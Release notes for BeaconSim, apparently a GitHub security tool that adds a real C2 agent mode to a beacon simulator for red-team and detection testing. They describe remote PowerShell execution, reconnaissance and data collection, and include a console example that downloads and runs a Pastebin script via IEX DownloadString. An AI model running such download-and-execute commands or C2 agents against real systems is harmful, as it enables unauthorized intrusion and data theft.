v1.1

BeaconSim v1.1.0 - C2 Agent Evolution

Release Date: May 28, 2025
Type: Major Release - New C2 Agent Capabilities

🚀 What's New

BeaconSim has evolved from a pure beacon simulator into a dual-mode cybersecurity tool that can function as both a simulation tool and a real C2 agent for authorized security testing.

✨ Major Features Added

🎯 C2 Agent Mode (NEW)

• Remote PowerShell execution - Execute commands via C2 server
• HTTP-based communications - RESTful API for C2 check-ins
• System reconnaissance - Built-in support for enumeration commands
• Remote script execution - Download and execute scripts from external sources (Pastebin, etc.)
• Session persistence - Maintain connections across network interruptions
• Cross-network operation - Works across subnets and VLANs

🛠️ Enhanced Configuration

• Dual-mode YAML config - Single config file supports both simulation and C2 modes
• C2 server settings - Configurable server URL and agent identification
• Flexible timing - Customizable beacon intervals for realistic C2 behavior
• Backward compatibility - Original simulation mode fully preserved

🔧 Technical Improvements

• Modern .NET support - Compatible with both .NET Framework 4.8 and .NET 9.0
• Enhanced error handling - Robust exception management for network operations
• Improved logging - Better visibility into agent operations and status
• Memory efficiency - Optimized for long-running agent operations

🎮 Usage Modes

Simulation Mode (Original)

.\BeaconSim.exe --config=targets.yaml --minInterval=30 --maxInterval=120

• Simulates malware C2 traffic for detection testing
• Supports multiple protocols (HTTP, HTTPS, DNS, TCP, etc.)
• Ideal for blue team training and tool validation

C2 Agent Mode (NEW)

.\BeaconSim.exe --c2

• Functions as real C2 agent for red team exercises
• Executes remote PowerShell commands
• Supports system enumeration and data collection

📋 Command Capabilities

The new C2 agent mode supports comprehensive PowerShell command execution:

System Information

• User context and privileges (whoami, whoami /priv)
• System details (systeminfo, Get-ComputerInfo)
• Hardware information (Get-WmiObject queries)

Security Reconnaissance

• Process enumeration (Get-Process)
• Service discovery (Get-Service)
• Security software detection
• Network configuration (ipconfig, netstat)

File System Operations

• Directory enumeration (dir, Get-ChildItem)
• File search and discovery
• Large file identification
• User directory exploration

Advanced Operations

• Remote script download and execution
• Event log analysis
• Registry queries
• Startup program enumeration

🔧 Configuration Examples

Simulation Mode Config

targets:
  - host: "8.8.8.8"
    protocols: ["ping", "tcp"]
    ports: [53]
  - host: "google.com"
    protocols: ["http", "https"]

C2 Agent Mode Config

c2_server:
  url: "http://192.168.1.100:8080"
  agent_id: "agent_001"

intervals:
  min_interval: 30
  max_interval: 120

🔗 Integration

Compatible C2 Server

BeaconSim v2.0 is designed to work seamlessly with [SimpleC2Listener](https://github.com/acquiredsecurity/SimpleC2Listener) for complete C2 framework functionality.

Command Examples

# From C2 Listener console
C2> cmd agent_001 whoami
C2> cmd agent_001 Get-Process | Sort-Object CPU -Descending
C2> cmd agent_001 IEX (New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/script')

📈 Performance Improvements

• Reduced memory footprint - Optimized for long-running operations
• Better network handling - Improved connection resilience
• Faster command execution - Streamlined PowerShell integration
• Enhanced compatibility - Works across different Windows versions

🛡️ Security Considerations

New Security Features

• Configurable timing - Randomized beacon intervals to avoid detection patterns
• Error resilience - Graceful handling of network interruptions
• Process isolation - Secure PowerShell command execution

Important Security Notes

• No encryption - HTTP communications are plaintext (HTTPS support planned)
• Privilege dependent - Command execution limited to current user context
• Network detectable - Generates identifiable C2 traffic patterns
• Authorized use only - Designed for legitimate security testing

🎯 Use Cases

Red Team Operations

• Post-exploitation - Remote system enumeration and command execution
• Lateral movement - Network reconnaissance and discovery
• Data collection - File system exploration and information gathering
• Persistence testing - Long-term access simulation

Blue Team Training

• Detection development - Generate realistic C2 traffic for analysis
• SIEM tuning - Test alerting rules with actual C2 communications
• Incident response - Practice with real C2 behavior patterns
• Tool validation - Verify EDR and network monitoring effectiveness

Security Research

• Malware analysis - Study C2 communication patterns
• Detection research - Develop new identification techniques
• Network security - Test segmentation and monitoring controls

📋 System Requirements

Minimum Requirements

• OS: Windows 10/11, Windows Server 2016+
• Framework: .NET Framework 4.8+ or .NET 9.0+
• Memory: 100MB RAM
• Disk: 20MB available space
• Network: HTTP connectivity to C2 server

Recommended Requirements

• PowerShell: Version 5.0+ (for optimal command execution)
• Network: Unrestricted HTTP access
• Privileges: Standard user (some commands may require elevation)

🐛 Known Issues

• Console output formatting may vary across different terminal types
• Large command outputs can cause display performance issues
• Network interruptions require manual agent restart
• Some PowerShell commands may require elevated privileges

🔮 Roadmap

Planned Features (v2.1+)

• HTTPS encryption - Secure C2 communications
• Authentication - Agent and server mutual authentication
• File operations - Upload/download capabilities
• Stealth improvements - Enhanced evasion techniques
• Multi-threading - Concurrent command execution
• Process injection - Advanced payload delivery methods

🆕 Breaking Changes

• Configuration format - New YAML structure (backward compatible)
• Command line options - Simplified argument structure
• Dependencies - Additional NuGet packages required

📚 Documentation

• README.md - Complete usage guide and examples
• Configuration Guide - Detailed YAML setup instructions
• Command Reference - PowerShell command examples
• Integration Guide - SimpleC2Listener setup and usage

🙏 Acknowledgments

Thanks to the cybersecurity community for feedback and testing that made this evolution possible.

⚠️ Legal Disclaimer

This software is provided for educational and authorized security testing purposes only. Users are responsible for ensuring compliance with all applicable laws and regulations. Only use this tool on systems you own or have explicit permission to test.

---

Beacon Sim v.1.0

🚀 BeaconSim v1.0 – Initial Release
BeaconSim is a lightweight C2 beacon simulator designed to help blue teams, SOC analysts, and detection engineers test and validate detection logic across EDR, SIEM, and network telemetry platforms.

This first release includes core functionality to simulate malware-like beaconing behavior via configurable intervals, protocols, and targets — all defined in a simple YAML configuration file.

🧰 Features
✅ Simulate C2 beacon behavior across multiple hosts and ports

🔁 Configurable loop count and beacon delay intervals

🧠 Easy YAML-based target list (IP/domain + protocol)

💡 Great for testing in EDR, SIEM rules, Threat Intel, Malware Lab.

🖥️ CLI interface with --help for usage

🌐 Supported Protocols
ping, http, https, dns, tcp, ftp, ssh, websocket